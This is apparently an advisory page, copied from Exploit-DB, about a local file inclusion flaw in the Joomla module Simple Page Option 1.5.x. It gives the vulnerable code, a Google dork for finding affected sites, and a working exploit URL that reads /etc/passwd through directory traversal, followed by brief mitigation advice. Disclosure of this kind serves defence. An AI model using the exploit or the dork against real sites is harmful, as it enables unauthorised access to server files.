Simple Page Option LFI

vendor:

Simple Page Option (mod_spo)

by:

SeguridadBlanca.Blogspot.com

7.5

CVSS

HIGH

Local File Inclusion (LFI)

CWE

Product Name: Simple Page Option (mod_spo)

Affected Version From: 1.5.x

Affected Version To: 1.5.x

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Backtrack and Windows 7

2011

A vulnerability exists in Simple Page Option (mod_spo) 1.5.x, which allows an attacker to include arbitrary files from the local system. This is due to the lack of proper sanitization of user-supplied input in the 'spo_site_lang' parameter of the 'email_sender.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with directory traversal sequences (e.g. '../../../../../../../../../../etc/passwd%00') to the vulnerable script.

Mitigation:

Filter user-supplied input with str_replace() or use htaccess protection to the vulnerable file.

Source

Exploit-DB raw data:

# Exploit Title: Simple Page Option LFI
# Google Dork: inurl:mod_spo
# Date: 15/07/2011
# Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca
# Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/mod_spo_1.5.16.zip
# Version: 1.5.x
# Tested on: Backtrack and Windows 7

Simple Page Option – LFI
Vulnerable-Code:
$s_lang
=& JRequest::getVar('spo_site_lang');
(file_exists(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php'))
? include(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php')
: include(dirname(__FILE__).DS.'languages'.DS.'english.php');
Vulnerable-Var:
spo_site_lang=

Expl0iting:
http://www.xxx.com/home/modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using
%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd% 00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se

Reparing?:
Just Filter with str_replace(); or htaccess protection to the vulnerable file.

gr33tz: Alfredo Arauz, SeguridadBlanca.Blogspot.com, Ecuador and Perú Security.